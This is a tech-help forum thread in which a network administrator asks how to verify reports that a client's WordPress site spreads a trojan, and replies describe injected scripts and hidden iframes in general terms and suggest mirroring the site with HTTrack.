Need some web people to give second opinion on tracking a virus on a website

I have a client who is being told their website is spreading viruses, or specifically the Tojan Horse Generic_r.bat.  I do not handle the website design or hosting, only the internal network jobs.

The webmaster insists everything is fine, but we were flagged before with Google search (they were re-directing people who searched for us to a "This website is known to spread viruses" and give the user a choice to continue or not.  We reported it to them, they did something and it started working fine again.  Now a dial forward three months, I have a random external consultant telling us our website gave them a virus, twice.  Once had to be cleaned, the other time it was picked up by the AV scanner she had loaded, both times  soon after as she went to the site.

I looked to see if there was a way to scan a website or it's directory, but everything I see is for a local computer, not a web server.  Any tips on this?  It is really more for my own improvement, since the web host company is someone selected by the marketing company they contracted with to do their sales and marketing work, but I am interested in the tools they would use to try to prove or disprove this.
LVL 9
tsaicoAsked:
Who is Participating?
 
grahamnonweilerConnect With a Mentor Commented:
When a website is suspected of spreading viruses it normally means it has been the subject of a "SQL Injection" attack, which is where some malicious script (normally Javascript) has been inserted in to the content of a page.

This was acheived either by submitting the script through a form, or more commonly by a remote controlled bot that searches through websites looking for vulnerabilities.

The actual script is often a hidden iFrame, that in turns causes your browser to download a script from another server not associated with the website you are viewing. This is also sometimes referred to as XSS or Cross Site Scripting attack.

Finding the infection is the job of the developer/owner of the website, as they will need to scan through their database to find the infected pages and correct it. This is carried out on the database server (or in smaller hosting environments the web server).

Now, if you use the HTTrack tool suggested above, you will certainly download the "infected" page, but it will not be identified by any conventional AV system. It will only be when you open the infected page in a browser on your local PC that the script will run.

Beware, you will still get infected as the Iframe will load the script from the external site!

HTTrack will not download the infection as it is called using Javascript, while HTTTrack only uses conventional HTML links/urls to download pages.

If the website has indeed been the subject of SQL Injection then it means that the underlying scripts that are producing the website are of a poor standard, and little or no security has been considered by the developer.

Unfortunately, this level of coding/development is all too common on the web these days.
0
 
Seaton007Connect With a Mentor Commented:
You could use HTTrack to download the web site and then scan it locally: www.httrack.com
0
 
tsaicoAuthor Commented:
Thank you for a very informative post.  It seems the best way to help secure a Word Press seems to be one of several security plugins.  I did find some websites that said the site was fine, but AVG had said two reports of infection were turned in over the last 30 days.

Since the plugins may or may not be installed already, I am not sure about it's effectiveness, since any malicious code will already be in place, and all the plugins check for changes in code or page sizes, or a change in the checksum, all of which will stay the same if we are already infected.  

Hopefully the web company hired by the marketing company that was hired by the company I work with does their due diligence and gets it resolved.
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.